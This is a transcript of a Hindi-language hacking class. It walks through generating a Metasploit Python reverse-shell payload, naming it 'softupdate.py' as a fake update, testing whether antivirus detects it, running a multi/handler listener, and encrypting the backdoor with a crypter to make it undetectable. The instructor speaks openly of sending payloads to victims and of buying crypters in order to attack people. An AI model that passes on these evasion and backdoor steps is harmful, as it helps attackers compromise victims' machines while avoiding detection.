ओके, नाउ सो गाइस यू कैन सी माय स्क्रीन हियर, ये स्क्रीन आपको दिख रही होगी। तो यहाँ पे हम काली पे चलते हैं पहले तो। पहले कुछ चीज़ों को हम देखते हैं, समझते हैं पहले, ठीक है। मेटास्प्लॉइट में कुछ भी नहीं है गाइस, थोड़ा सा आपको समझना पड़ेगा पहले चीज़ों को। मेटास्प्लॉइट फ्रेमवर्क को स्टार्ट करने के लिए आप सबको पता है, सिंपल सा कमांड MSF कंसोल आप कमांड टाइप कीजिएगा, मेटास्प्लॉइट फ्रेमवर्क स्टार्ट हो जाता है, ठीक है। पेलोड क्रिएट करने के लिए हमारे पास जो कमांड होता है वो होता है MSF वेनम कमांड होता है, -h करके आप इसकी हेल्प फाइल देख सकते हैं। सारी हेल्प फाइल में आपको सारी चीज़ें जो भी आप MSF वेनम के साथ लगा सकते हैं वो सारी यहाँ पे आपको दिख जाएंगे, ठीक है। MSF वेनम करके यहाँ पे हाइफन लिस्ट एंड ऑल कर दीजिएगा, तो जितने भी इसके अंदर में जो भी चीज़ें हैं, लाइक डिटेल्स जो है पेलोड के हो गया, फॉर्मेट्स हो गए, कौन कौन सी फॉर्मेट्स को सपोर्ट करता है, कौन कौन से फाइल सिस्टम्स, फाइल टाइप्स को सपोर्ट करता है, ये सारी चीज़ें आपको यहाँ पे भी ये बता देता है। नाउ अब गाइस पेलोड को क्रिएट करना, यानी कि एक तरह से आप बोल सकते हैं कि खुद का एक वायरस क्रिएट करना, खुद का एक ट्रोजन क्रिएट करना मेटास्प्लॉइट के थ्रू एक हीट एंड ट्रायल मेथड है। हीट एंड ट्रायल मेथड किस लिए? FUD के लिए, until and unless you are actually using a crypter। अब सबसे मेन चीज ये है कि ऐसी कोई भी टेक्निक अब तक अवेलेबल नहीं है जो बिना किसी सर्विस को एक्सप्लॉइट किए कंप्लीटली इनक्रिप्ट कर देता हो किसी पेलोड को। कोई भी सर्विस नहीं है अवेलेबल, किसी ने ना बनाया ना वो बना सकता है स्टिल, बिकॉज इसका रीज़न ये है कि अगर वो बनाते भी हैं तो कुछ ही टाइम में एंटीवायरस सॉल्यूशंस जो होती हैं, कंपनी जो होती है, वो उसको डिटेक्ट करना शुरू कर देंगी। स्टार्टिंग के कुछ टाइम के लिए हो सकता है वो इनक्रिप्टेड होके और आपके एंटीवायरस डिटेक्ट ना कर पाए। आफ्टर सम टाइम एंटीवायरसेस विल डिटेक्ट द पैटर्न, द सिग्नेचर पैटर्न, एंड दे विल जस्ट सिंपली कैच दोज पेलोड्स, दोज वायरसेस, एंड उसके बाद वो उसको डिटेक्ट करना स्टार्ट कर देंगे, ठीक है ना। इसमें कुछ हमारे से भी गलतियां होती हैं, जैसे काफ़ी सारे ऐसे क्रिप्टर्स होते हैं जो काफ़ी अच्छा काम कर रहे होते हैं, ठीक है, काफ़ी अच्छा काम कर रहे होते हैं। उसमें क्या होता है कि जो यूजर्स हैं वो क्या करते हैं, देखो, दे जनरेट द पेलोड, पेलोड जनरेट करने के बाद क्या करते हैं, वो एंटीवायरसेस को टेस्ट करने के लिए वो ऑनलाइन वेबसाइट्स पे अपलोड करते हैं। दे अपलोड ऑन द ऑनलाइन वेबसाइट्स, ठीक है। ऑनलाइन वेबसाइट जैसे कि वायरस टोटल पे अपलोड कर दिया, ठीक है। इसी वेबसाइट जो लॉग शेयर करती हैं बेसिकली जो भी उसके ओनर है उनके साथ, एंड वो जो है एंटीवायरस सॉफ्टवेयर्स के मेकर्स, मैन्युफैक्चरर्स या डेवलपर्स बोल लो, उनके साथ वो लॉग शेयर करती है। एंड एंटीवायरस सॉफ्टवेयर्स को पता चल जाती है, सबका टाई अप होता है। अब यहाँ पे बात करते हैं, कुछ ऐसी वेबसाइट्स हैं जिनका मानना है, जैसे कि मानना है एंटी स्कैन, ठीक है। अब इस वेबसाइट के लिए ये मानना है गाइस कि एंटी स्कैन जो है ये कंप्लीटली नो लॉग डिस्ट्रीब्यूशन सिस्टम को फॉलो करता है, यानी कि यहाँ पे कोई भी लॉग जो है वो डिस्ट्रीब्यूट नहीं की जाती है इनके द्वारा। ऐसा ये बोलते तो हैं, बट इनके पास अगर एक बार लॉग गई, जो कि जाती है, जब भी आप कोई स्कैन करोगे फाइल को तो लॉग्स तो इनके पास जाएगा ही जाएगा। अब इनके ऊपर है कि ये लॉग को कहीं पे दे रहे हैं या नहीं दे रहे हैं। अब एक बार आपने मुझे कोई भी अपनी सामान, कोई भी चीज़ दे दी, लेट सपोज, अब मैं ये बोलूँ कि ठीक है ये जो चीज़ है, ये जो थिंग है, ये मेरे पास सेफ है और किसी के पास ये नहीं जाएगी, तो आपको तो बस बिलीव ही करना पड़ेगा ना, इसके अलावा आप कुछ कर नहीं सकते हो। यू कैन जस्ट हैव ट्रस्ट ऑन मी कि हाँ सर ने बोला है तो सर इसको आगे फॉरवर्ड नहीं करेंगे। अगर मैं कर दूं तो आप कुछ नहीं जानते हो, कुछ नहीं कर सकते हो, आप जानोगे भी नहीं अगर मैं इंटरनली करता हूं तो, और अगर ना करूं तो ये अच्छी बात है। सो नाउ मुझे ऐसी वेबसाइट्स पे आई डोंट नो बट ऑलवेज से डाउट रहा है, ऑलवेज से, इवन ऑन एंटी स्कैन टाइप वेबसाइट्स, ठीक है। लेकिन दे क्लेम कि हम नहीं करते हैं शेयर, तो ठीक है मान लेते हैं, but always it's not a good idea to upload your payload on any of the online scanning websites rather than आप सिंपली जब पेलोड बना रहे हो भैया तो आप उसको डायरेक्टली विंडोज वगैरह में भेज के देख लो, विंडोज डिफेंडर को ऑन रखो या कोई भी एंटीवायरस को ऑन रखो, लेटेस्ट अपडेटेड सिचुएशन में रखो उसको। अगर डिटेक्ट हो गई यानी पेलोड आपका डिटेक्टेबल है, नहीं हुई इसका मतलब आपने बाईपास कर लिया, आपको ऑनलाइन डालने की जरूरत बिल्कुल भी नहीं है, आप डायरेक्ट लाइव चेक कर लो। हाँ बट यहाँ पे क्या होता है ना, विक्टिम के केस में
अब हम विक्टिम के सिस्टम पे लाइव चेक करने का तो रिस्क नहीं ले सकते ना कि अब मान लो वर्क किया तो किया, नहीं तो नहीं किया तो गायब। तो उसके लिए लोग पहले चेक कर लेते हैं, तो उनके पास एक ऑप्शन बचता है ऐसी वेबसाइट्स पे अपलोड करके चेक करने का। एक nodistribute.com भी है, वहां पे भी होता है, ठीक है। द मेन थिंग इज दिस। नाउ जब भी आप पेलोड जनरेट करते हो गाइस, तो पेलोड के अंदर में कुछ चीजें होती हैं जिसको हम बोलते हैं इनकोडर्स, ठीक है, जिनको हम बोलते हैं इनकोडर्स। एक टर्म होता है इनकोडर्स। अब ये क्या होता है ना, कई लोग समझते हैं कि इनकोडर्स जो होते हैं मेटास्प्लॉइट फ्रेमवर्क में, दोज आर एक्चुअली फॉर बाईपासिंग एंटीवायरस, जो एंटीवायरस है उनको बाईपास करने के लिए होती है, बट एक्चुअली ऐसा नहीं होता है। इनकोडर सिर्फ और सिर्फ आपके पेलोड को इनक्रिप्ट टाइप करने के लिए होता है, कि इनक्रिप्ट कर देता है एक तरह से, लेकिन वो बाईपास कर देगा एंटीवायरस को, इसकी कोई गारंटी नहीं होती है, ना ही इनकोडर्स ऐसी गारंटी आपको देते हैं। हाँ, अगर आपको शेल कोड इंजेक्शन अच्छे से आती है, अगर आपने प्रॉपर शेल कोड इंजेक्शन किया है, दैट फॉर दैट यू नीड टू नो अ प्रॉपर नॉलेज ऑफ सम गुड प्रोग्रामिंग लैंग्वेजेस लाइक सी, C++, C# या पाइथन, जिस लैंग्वेज के आप शेल कोड्स को उसमें आप इंसर्ट कर सकते हो, देन आपके चांसेस हैं कि आप थोड़े बहुत लेवल के एंटीवायरसेस को बाईपास कर पाओगे। वो भी बहुत देर तक नहीं चलेगा, एंटीवायरसेस जो हैं उस पैटर्न को डिटेक्ट कर सकती हैं कुछ टाइम में ही, एंड अगेन आपका वो पेलोड एफयूडी नहीं रह जाएगा। नाउ यू माइट बी थिंकिंग कि सर फिर एफयूडी होगा कैसे, मतलब कैसे पॉसिबल है, क्या ये पॉसिबल भी है एफयूडी बनाना? देखो कुछ चीज़ें, कुछ बहुत सारी जो ऑनलाइन मैंने देखा है कोर्सेज वगैरह भी सेल करते हैं, उसमें भी वो बोलते हैं स्पेशली एंड्रॉयड वाले जो कोर्स होते हैं, या बहुत लोग ऐसा क्लेम करते हैं कि एफयूडी आपका हो जाएगा, ये कर लो वो कर लो, हम कोर्स में दे रहे हैं आपको, बता रहे, सिखा रहे हैं। देखो सिखाने का ये है कि 2 मिनट या 10 मिनट या एक आध दिन के लिए एफयूडी कर देना, दैट इज नॉट द वैलिड थिंग। वो तो कैसे भी आप मतलब कैसे भी आप लाइक शेल कोड इंजेक्शन थोड़ा इधर करके, थोड़ा गार्बेज वैल्यू वगैरह उसमें मिला के कर दोगे, आपका वो पॉसिबल है, हो सकता है। बट एक्चुअली एफयूडी बनाना ये तभी होगा जब यू हैव अ क्रिप्टर और यू आर यूजिंग अ क्रिप्टर, सिंपल सी बात है। और वो भी वैसी क्रिप्टर जिसका इंजन हमेशा कुछ कुछ टाइम पे अपडेट होता रहे, जब भी वो डिटेक्ट हो जाए, जब भी वो डिटेक्ट हो जाए, ऑलवेज रिमेंबर दिस। ठीक है, सो यू कैन जस्ट यूज हीट एंड ट्रायल मेथड। आप हमेशा एफयूडी बनाने के लिए सिर्फ और सिर्फ हीट एंड ट्रायल मेथड ही यूज कर सकते हो। ना एग्जीक्यूटेबल ईएक्सी के केस में, जो कि विंडोज का डिफॉल्ट एग्जीक्यूटेबल हमारा माना जाता है, और भी है जैसे, है ना, विंडोज के तो और भी होते हैं, लाइक अब बैट भी है, PS1 वगैरह भी, पावर शेल के भी है, बहुत सारे हैं, ठीक है। बट एक्चुअल डिफॉल्ट एग्जीक्यूटेबल जो है आपका ईएक्सी, उसको एक्चुअली में एफयूडी बनाने के लिए बहुत पापड़ बेलने पड़ते हैं। दूसरे एग्जीक्यूटेबल हो सकता है आप बना सके, मे भी आपके लिए इजी हो जाए, पर उसको बहुत ही मुश्किल है, ठीक है। इसका प्रॉपर रीजन जो है मैंने आपको ऑलरेडी बताया। प्रॉपर रीजन सिंपल सा है कि जो भी पैटर्न है एंटीवायरसेस उसको डिटेक्ट कर लेती हैं बहुत ही जल्द, एंड ये सब में कहीं ना कहीं 90% गलती यूजर्स की होती है। 10% जो होता है वो कि वो हम बना नहीं पा रहे, बिकॉज हमें उतनी नॉलेज एक्चुअली में लैंग्वेजेस की नहीं है, और अगर लैंग्वेजेस की है भी ना, तो उसमें चाहिए एल्गोरिदम, वो एल्गोरिदम जो एक्चुअली वो लॉजिक जो एक्चुअली उस एंटीवायरस सॉल्यूशन को बाईपास कर पाए, जो कि सारी एंटीवायरसेस के लिए अलग अलग होंगी, एंड बहुत ही कॉम्प्लेक्स प्रोसेस है। इसलिए क्रिप्टर्स को कोई भी जनरली, कोई भी डेवलपर जनरली उठ के नहीं बना सकता, चाहे वो किसी भी लेवल का कर्नल लेवल की प्रोग्रामिंग करेगा, बट वो क्रिप्टर बनाएगा इसकी गारंटी मैं नहीं दे सकता, इसकी गारंटी वो खुद नहीं देगा। इट्स वेरी टफ थिंग एक्चुअली। नाउ अब बात करते हैं, तो ऑप्शन क्या है? ऑप्शन ये है कि या तो आप क्रिप्टर को बाई करो किसी ट्रस्टेड प्लेटफॉर्म से, इफ यू वांट एक्चुअली, इफ यू आर डेस्परेट, कि बहुत ज़्यादा डेस्परेट हो, किसी को हैक करना है वगैरह वगैरह, तो ऐसा रियल लाइफ सिनेरियो में लोग तभी करते हैं जब कोई प्रोजेक्ट हो, बहुत बड़ी चीज़ करनी हो, बहुत बड़ा अटैक करना हो, बहुत कुछ, मतलब वो चीज़ करनी हो, तब जाके कोई करता है। नॉर्मली आप कभी भी रियल वर्ल्ड में ना, कभी भी यू विल नेवर एवर डू दीज थिंग्स, कभी नहीं करोगे, जरूरत ही नहीं पड़ेगी।
हाँ खुद के लिए करना चाहते हो, किसी पर अटैक करना चाहते हो, देन यू कैन यूज दीज थिंग्स, देन आप कर सकते हो। ठीक है, अब यहाँ पे जैसे कि फॉर एग्जाम्पल सी इनकोडर्स, ये देखिए आपने इनकोडर्स, यहाँ पे सारे इनकोडर्स आपको दिख रहे हैं। ठीक है, अलग अलग इनकोडर्स हैं, लाइक कोई पावर शेल का है, कोई पर्ल का इनकोडर है, कोई एक्सोर इनकोडर है, कोई डायनेमिक की एक्सोर इनकोडर है, अलग अलग तरीके के इनकोडर्स जो हैं आपको यहाँ पे देखने को मिल जाते हैं। ठीक है, नाउ लेट्स डू वन थिंग, लेट्स डू वन थिंग। अब यहाँ पे मैं अगर नॉर्मल अगर पेलोड बना देता हूँ, नॉर्मल एक पेलोड बना देता हूँ, ठीक है, लाइक मेटास्प्लॉइट से ही मैं नॉर्मल पेलोड बना लेता हूँ और उसको मैं अगर विंडोज़ में सेंड कर देता हूँ एंड देखता हूँ, तो वो आराम से डिटेक्ट हो जाएगा। ठीक है, आराम से डिटेक्ट हो जाएगा, कोई वो नहीं, लाइक कोई प्रॉब्लम नहीं आएगी, आराम से इजीली वो डिटेक्ट होगा। बट वही अगर मैं थोड़ा सा उसमें चेंज करूँ, मतलब लिटिल बिट चेंज, थोड़ा सा चेंज कर दे अगर हम, जैसे कि हम exe के जगह पे अगर हम व्हाट हैपन इफ वी मेक पाइथन पेलोड, अगर हम exe के जगह पे अगर हम पाइथन के पेलोड बना दें, तो फिर कैसे होगा, फिर क्या हो सकता है? तो वहां पे उस केस में डिटेक्शन तो होगी, बट उस केस में हमारे पास एक ऑप्शन होगा जिसको हम यूज करके ट्राई कर सकते हैं कि भैया आगे इसको हम अगर एफयूडी बना पाए तो। देखो, जैसे कि कोई भी पेलोड अगर बनाना हो तो MSA वेनोम कमांड होती है। ठीक है, -p से आप पेलोड बना सकते हो, -p और पेलोड हो गया आपका। यहाँ पे अगर आपको पाइथन का पेलोड बनाना है तो पाइथन मीटरप्रेटर रिवर्स TCP ये हम कर देते हैं। ठीक है, कर दिया हमने पेलोड बनाने के लिए सिंपल। उसके बाद यहाँ पे हमें एल होस्ट करना है, हमें लोकल होस्ट जो है वो तो देना ही देना है, तो एल होस्ट इज इक्वल टू, यहाँ पे पहले तो हम देख लेते हैं अपना 118 है हमारा, 192.168.29.118 हमने दे दिया। एल पोर्ट हम दे देते हैं, एल पोर्ट इज इक्वल टू 1234 ही दे देते हैं। ठीक है, तो हमने ये सारी चीजें दे दी। अब यहाँ पे गाइज आपको अगर पाइथन की पेलोड जनरेट करनी है, इफ यू वांट टू लाइक जनरेट अ पाइथन पेलोड, देन प्लीज टेल मी, एनीवन प्लीज टेल मी कि कैसे लाइक क्या यहाँ पे कर सकते हैं पाइथन की पेलोड बनाने के लिए, यहाँ पे क्या करेंगे आप लोगों ने, कोई बताओ। -fpy, अच्छा, और कोई बताओ, और कोई बताइए भैया जल्दी। एक ही कोई नहीं बताएगा ना, मतलब और भी बताओ। ठीक है, वर्जन देना पड़ेगा, वर्जन कौन सा विकास, हाँ ठीक है, वर्जन देना पड़ेगा, अच्छी बात है। कौन सा वर्जन देना पड़ेगा वो बताइए जरा। प्लीज टेल मी कि कौन सा वर्जन भैया देना पड़ेगा। पाइथन 3, और कोई पाइथन 3 देना पड़ेगा, चलो इसमें पाइथन 3 की, चलो ठीक है, और बताइए भैया, और कोई बताइए। ये तो थोड़ा सा मेरे पल्ले नहीं पड़ा, बट स्टिल बताइए। सिंपली हाइफन ओ करके पेन और भी तो कर सकते हैं। ठीक है, और एनीवन एल्स जल्दी। -हाइफन ए किस लिए मोहित? मोहित -ए किस लिए, जल्दी लिख दो एक बार। प्लीज राइट इट डाउन। वो सिस्टम कितने उसका है इसके लिए। ठीक है, सिस्टम कितने की है देखो। ठीक है, अब बहुत जितने कम लोग बोलते हैं, बाकी वैसे तो कम ही लोग ने बोला है फिर भी। ठीक है, चलो देखो यहाँ पे सिंपल सी बात है, यहाँ पे हम पाइथन की पेलोड बना रहे हैं। ठीक है भैया,
यहाँ पे हम सिंपली क्या बना रहे हैं, पाइथन की पेलोड बना रहे हैं। नाउ यहाँ पे पाइथन की पेलोड जब बना रहे हैं तो यहाँ पे हमें सिंपली फॉर्मेट बताना पड़ेगा। जैसे कि हम जब विंडोज में भी बनाते हैं तो हमने -f से फॉर्मेट बताते हैं, तो -f से यहाँ पे हमारा फॉर्मेट विंडोज के लिए exe होता है। यहाँ पे हमारा -f से फॉर्मेट दो तरीके से आप कर सकते हो। दो तरीके से क्या कर सकते हो, देखो यहाँ पे जब हमने यहाँ पे लिस्ट ऑल किया हुआ था जब यहाँ पे हम करेंगे msf venom फॉर्मेट लिस्ट करो, लिस्ट फॉर्मेट्स, ठीक है। जब आप फॉर्मेट्स को लिस्ट कीजिएगा जस्ट वेट, जब आप फॉर्मेट को लिस्ट कीजिएगा तो यहाँ पे आपको एक py फॉर्मेट भी दिख जाएगी, ठीक है। मतलब py फॉर्मेट आपको दिख जाएगी। इसके अलावा यहाँ पे जब आप थोड़ा सा नीचे आएंगे तो यहाँ पे आपको एक रॉ फॉर्मेट भी दिख जाएगा, ठीक है। रॉ फॉर्मेट का मतलब आप सिंपली हो गया ना कि लाइक अगर आपने जो पेलोड सिलेक्ट किया है, अगर पाइथन का पेलोड सिलेक्ट किया है तो ये कोशिश करेगा कि पाइथन के ही उसमें पेलोड जो है वो बना के दे दे। बट अगर आप डिफाइन करना चाहते हैं तो आप डिफाइन -f से py यहाँ पे कर सकते हैं, जैसे कि आपने exe के केस में यहाँ पे किया हुआ था, ठीक है। उसके बाद -o दे सकते हैं आप, यहाँ पे आप रॉ भी लगा सकते हैं, कोई प्रॉब्लम नहीं है। उसके बाद -i दे सकते हैं, ठीक है। फॉर्मेट हमारा py हो गया, ओके। -o से हम दे देते हैं इसको लाइक सॉफ्ट अपडेट डॉट py ये करके, और यहाँ पे सिंपली हम एंटर कर देंगे। नाउ इट विल जस्ट गिव यू द आउटपुट। अगर सब कुछ सही रहा तो ये आपको आउटपुट दे देगा। सो लेट्स सी। ओके, यहाँ पे हमारा ये सॉफ्टवेयर जो है वो क्रिएट हो चुका है, सॉफ्ट अपडेट डॉट py, ठीक है, क्रिएट हो गया। अब गाइज यहाँ देखो, यहाँ पे हमारे पास ये फाइल है सॉफ्ट अपडेट डॉट py। हम चलते हैं ब्राउजर पे, हम वही काम करेंगे एक बार। ब्राउजर पे चलते हैं एंड हियर वी आर गोइंग टू यूज एंटी स्कैन वेबसाइट को हम एक बार चालू करते हैं, ठीक है। लेट्स सी इट्स वर्किंग और नॉट, कई बार नहीं काम करता है, बट देख लेते हैं। एंटी स्कैन पे चलते हैं एंड हम क्या करेंगे अभी, ओके यहाँ पे आ चुके हैं हम। यहाँ पे ब्राउज पे क्लिक करेंगे एंड यहाँ पे हमारा सॉफ्ट अपडेट डॉट py है, इसको ओपन कर लेते हैं इस फाइल को, एंड इस फाइल को एक बार स्कैन करते हैं। 4 स्कैन हमारे पास रिमेनिंग है। तो यहाँ पे ये बोल रहा है कि भैया आपका जो है py एक्सटेंशन यहाँ पे ये स्कैन नहीं कर रहा। कोई बात नहीं, इसका हम सबसे सिंपल तरीका एक कर ले रहे हैं। यहाँ पे सॉफ्ट py डॉट py वाली जो है इसको कॉपी कर लेते हैं, यहाँ पे कॉपी कर लेते हैं एंड यहाँ पे हम इसको पेस्ट करते हैं अपने विंडोज में, ठीक है। जस्ट वेट, ये रहा सॉफ्ट अपडेट डॉट py। यहाँ पे ये विंडोज में हमने यहाँ पे इसको पेस्ट कर दिया, सिंपल सा। नाउ राइट क्लिक करते हैं, शो मोर ऑप्शंस, एंड इसको क्या करते हैं ना, डिफेंडर से स्कैन करके देखते हैं। सिंपली लेट्स सी क्या हुआ। यहाँ पे आ रहा है नो करंट थ्रेट्स, कोई करंट थ्रेट यहाँ पे अवेलेबल नहीं है। अब गाइज यहाँ पे क्या करते हैं, व्हाट वी आर गोइंग टू डू, हमने सिंपली यहाँ पे बस एक पेलोड बनाया सिंपली, और अभी कुछ किया नहीं है इसमें, हमने बस सिंपली एक पाइथन का पेलोड हमने बना दिया। हमने क्या करना है, अब MSF कंसोल स्टार्ट कर लेते हैं। जस्ट सी क्या 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 चीजें हो रही हैं अभी यहाँ पे, देखते रहो। ठीक है, यहाँ पे हमने स्टार्ट कर लिया ये, ठीक है। नाउ नाउ अब जो है यहाँ पे हम अपना हैंडलर स्टार्ट कर लेते हैं। जैसे कि मैंने बोला, हैंडलर जो होता है क्या होता है गाइज, वो एक एक्सप्लॉइट है। जो हैंडलर जो है ना आपका, जो वो एक एक्सप्लॉइट है सिंपली, जो बेसिकली आपके किसी भी रिवर्स कनेक्शंस के लिए उसको होल्ड करने के लिए उसके लिए यूज में आता है, ठीक है। तो यहाँ पे हम करते हैं यूज एक्सप्लॉइट मल्टी
हैंडलर, ठीक है, हमने स्टार्ट कर लिया। अब यहाँ पे आ चुका है, यहाँ पे अब जो है यहाँ पे ये पेलोड कॉन्फ़िगर हो चुका है, जेनरिक शेल रिवर्स टीसीपी, ये पेलोड कॉन्फ़िगर हुआ है यहाँ पे, ठीक है। अब गाइस यहाँ पे पेलोड के केस की अगर बात करें ना, तो जो भी आपका व्हाटएवर पेलोड आप यूज करते हैं वो भी आपका हिट एंड ट्रायल मेथड होता है। आप अलग अलग डिफरेंट पेलोड्स के लिए जा सकते हो टेस्टिंग के लिए कि कौन सा पेलोड जो है आपके क्रिएटेड पेलोड के साथ जिसे आपने विक्टिम के पास भेजा है वो सही से वर्क कर रहा है, या आप चेक कर सकते हो, ठीक है। तो अब यहाँ पे आप देख सकते हो शो पेलोड्स, यहाँ पे आप करोगे तो यहाँ पे आपको जो भी अवेलेबल पेलोड्स हैं वो आपको यहाँ पे ये दिखा देगा, ठीक है। शो पेलोड्स यहाँ पे करोगे तो आपको अवेलेबल पेलोड्स जो है वो आपको यहाँ पे दिख जाएंगे। जस्ट वेट फॉर अ सेकेंड, ठीक है, ये सारे पेलोड्स आपको यहाँ पे दिख गए। शो पेलोड्स करोगे, यहाँ पे आप जितने भी अवेलेबल पेलोड्स हैं यहाँ पे ये आपको दिख जाएंगे, ठीक है। अब यहाँ पे हम क्या कर सकते हैं, यहाँ पे क्या कर देते हैं, यहाँ पे कर देते हैं पाइथन। लेट्स सी क्या होता है। ठीक है, अब यहाँ पे हमने पेलोड्स को चेक किया, नोटपुट पेलोड्स को चेक किया यहाँ पे। अब हमने क्या करना है, यहाँ पे शो ऑप्शंस कर देते हैं। यहाँ पे आप देख सकते हो एक्सप्लॉइट मल्टी हैंडलर स्टार्ट हो चुका है। एल होस्ट चाहिए, एल पोर्ट चाहिए, बिल्कुल सही है, ठीक है। जो आपका जिस पे की कनेक्शन रिवर्स कनेक्शन आपका क्रिएट होके आएगा वो आपका आईपी देनी है, तो आपकी करंट जो आईपी है वही देना होता है। पेलोड के केस में, जेनरिक शेल रिवर्स टीसीपी के केस में यहाँ पे सिंपली क्या करता है ना गाइस, ये एक शेल आपको लाके दे देगा, सिंपली एक शेल लाके दे देगा, ठीक है। तो यहाँ पे आप दो तीन चीजें कर सकते हो, लाइक जैसे कि आपने जैसे क्रिएट किया था पेलोड, जब आपने पेलोड यहाँ पे क्रिएट किया था, सी यहाँ पे आपने जब पेलोड क्रिएट हमने किया था, वेयर इट इज, ठीक है, इसी में हमने पेलोड क्रिएट किया था। तो हमने क्या किया था, हमने पेलोड के टाइम में पाइथन मीटर पेटर रिवर्स टीसीपी डाला था, ठीक है। तो हमें उसी से रिलेटेड कोई एक पेलोड सेट करना चाहिए, ज्यादा बेटर होता है। तो सेट पेलोड यहाँ पे हमने कर दिया, जस्ट वेट, ओके, सेट पेलोड ओके, पाइथन मीटर पेटर रिवर्स टीसीपी, ठीक है। ये हमने एक पेलोड सेट कर दिया यहाँ पे। अब जो है हमारा पेलोड जो है वो क्या हो गया, शो ऑप्शंस, वो हमारा हो गया पाइथन मीटर पेटर रिवर्स टीसीपी, ठीक है, जिससे हमने एक पेलोड क्रिएट किया था वही हो गया। अब यहाँ पे हम सेट एल होस्ट कर देते हैं। एल होस्ट 192.168.29.118 ही था शायद, ठीक है। हमने कर दिया। एलपोर्ट हमारा एलपोर्ट भी सेट करना पड़ेगा क्योंकि हमने एलपोर्ट को अलग रखा था, 1 2 3 4 रखा था, तो हमने एलपोर्ट भी सेट कर दिया 1 2 3 4। अगेन शो ऑप्शंस करेंगे एंड यहाँ पे हमें सारी डिटेल्स अवेलेबल हो जाएगी, पॉपुलेट होके दिख जाएंगी। यहाँ पे दैट्स इट गाइस। अब यहाँ पे आपको इसको एक्सप्लॉइट को रन करना है। जैसे एक्सप्लॉइट रन किया, यहाँ पे रिवर्स टीसीपी हैंडल स्टार्ट हो जाएगा आपका और विक्टिम के कनेक्शंस का वेट करना लगेगा। जैसे ही विक्टिम इस चीज को एग्जीक्यूट करेगा, यहाँ पे हमें मिलना चाहिए, बट देखते हैं यहाँ पे, जैसे ये हमारा सॉफ्ट अपडेट डॉट पीवाई, यहाँ पे एक बार क्या करते हैं, हम इसको ऐसे कर लेते हैं, एग्जीक्यूट कर लेते हैं, डायरेक्ट भी एग्जीक्यूट करके देख लेते हैं। एक बार हमने डायरेक्ट एग्जीक्यूट किया, यहाँ पे हमें कुछ भी अभी फिलहाल के लिए तो कुछ नहीं मिला है। अब हम इसको क्या कर लेते हैं, क्योंकि ये दिस इज लाइक py फाइल, so let's open the terminal here। यहाँ पे हमने टर्मिनल ओपन कर दिया। अब यहाँ पे हम करते हैं पाइथन 3 से ही कर लेते हैं, देखते हैं, सॉफ्ट अपडेट डॉट पी वाई, लेट्स ओके, नॉट फाउंड, ठीक है। तो पाइथन नॉर्मल पाइथन रख लेते हैं। चलो इसको एग्जीक्यूट कर दिया हमने। यहाँ पे अब देखते हैं क्या होता है, नथिंग, वी आर गेटिंग नथिंग, हमें यहाँ पे कुछ भी नहीं मिल रहा है, ठीक है। हमने वहाँ पे किया, एग्जीक्यूट किया, सब चीज़ें करी यहाँ पे, बट हमें यहाँ पे एक्चुअली वी आर नॉट गेटिंग एनीथिंग हियर, कुछ भी हमें नहीं मिल रहा है। ऐसा इसलिए, ऐसा क्यों हो रहा है गाइज, एनीवन कैन टेल मी, जबकि एंटीवायरस डिटेक्ट नहीं करी फिर भी नहीं हो रहा है, ऐसा क्यों, एनीवन कैन टेल मी, एनीवन कैन टेल मी। वर्जन मिसमैच होने की वजह से, जैसे कि जी फॉर एग्जांपल कोई एग्जांपल बताओ कैसे, मतलब
पाइथन 2 में होंगे तो पाइथन 2 से रन करके देखें, ऐसा बोल रहे हो? ठीक है, तो जैसा कि उन्होंने बोला जीन ले, तो हम क्या करते हैं एक बार उनके अकॉर्डिंग भी करते हैं। पाइथन 2 खैर पाइथन 2 का तो यहाँ पे है ही नहीं। चलो एक काम कर देते हैं, जस्ट डू वन थिंग। एक बार और ट्राई कर लेते हैं। स्टिल वी आर नॉट गेटिंग एनीवन एल्स, कि क्यों नहीं हो रहा कोई और? इस जील ने बोला कि वर्जन मिसमैच हो रहा है एक्चुअली, बट वो चीज़ है नहीं, बट फिर भी बताइए। और कोई कुछ भी बोलना चाहेगा? ठीक है, चलो ठीक है। अगर शायद शायद ब्रिज में करना पड़े हैं, ब्रिज में मतलब ब्रिज में करना पड़ेगा, ये क्या ब्रिज? इसका इसका ब्रिज से क्या कनेक्शन है? आईपी गलत होगा, आईपी तो भाई बिल्कुल सही लग रहा है मुझे। आई एफ कॉन्फिग 191.29.118 बिल्कुल सही है आईपी। 21 ठीक है। अब देखो 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 यहाँ पे मैं फिलहाल के लिए व्हाट आई एम गोइंग टू डू, फिलहाल के लिए इसको मैं रोक रहा हूँ, इसको मैं इंटरप्ट कर रहा हूँ। आई एम जस्ट स्टॉपिंग इट, ठीक है। फिलहाल के लिए मैंने इसको रोक दिया। देखो यहाँ पे अब हम क्या करते हैं, यहाँ पे हमारे पास एक टूल है। टूल क्या है? NX स्क्रिप्ट। वी हैव NX स्क्रिप्ट। ठीक है, इसको ओपन करते हैं। ये गिटहब पे टूल है। बेसिकली ये क्या है मैं आपको दिखा देता हूँ। यहाँ पे देखो, NX script is a polymorphic Python backdoor crypter written in Python by Hadi Mean. The output is fully undetectable. इन्होंने एक Python crypter बनाया है स्पेशली डिजाइन फॉर Python फाइल्स ओनली। ठीक है, स्पेशली डिजाइन फॉर Python फाइल्स। अब हम क्या करते हैं, एक बार इसको भी ट्राई करते हैं। इसको हम git clone कर लेते हैं। See what we are going to do. We are going to do git clone। NX स्क्रिप्ट को क्लोन किया, NX स्क्रिप्ट के डायरेक्टरी में गए, ls किया यहाँ पे, अरे भाई ls किया यहाँ पे, दो फाइल्स आई यहाँ पे, chmod +x NX स्क्रिप्ट, इसको एग्जीक्यूट करा दिया, एग्जीक्यूटेबल बना दिया, ./NX स्क्रिप्ट -h से इसकी हेल्प फाइल आपको दिख जाएगी। ठीक है, नाउ व्हाट इट सेज कि अभी आपको इसको क्या करना है, अभी आपको क्या करना है, जैसे आपको सिंपली इसको यूज कैसे करना है, सिंपली आपको ./NX स्क्रिप्ट लगाना है, यहाँ पे ./NX स्क्रिप्ट लगानी है। उसके बाद आपको हाइफन फाइल इज इक्वल टू जो आपका फाइल बनाया है आपने वो फाइल, और फिर हाइफन आउटपुट इज इक्वल टू जो आपका इंक्रिप्टेड फाइल चाहिए वो फाइल आपको ये करनी है, बस सिंपली। जैसे कि इन्होंने बताया कि एक shell.py है, तो लाइक shell.py ये कर दिया, एंड डिफॉल्ट आउटपुट फाइल बैकग्राउंड, बट यू कैन एडिट द सोर्स कोड। ये फिर इसके बाद ये भी इसके मतलब ऑप्शंस बता रहे हैं कि किस तरीके से 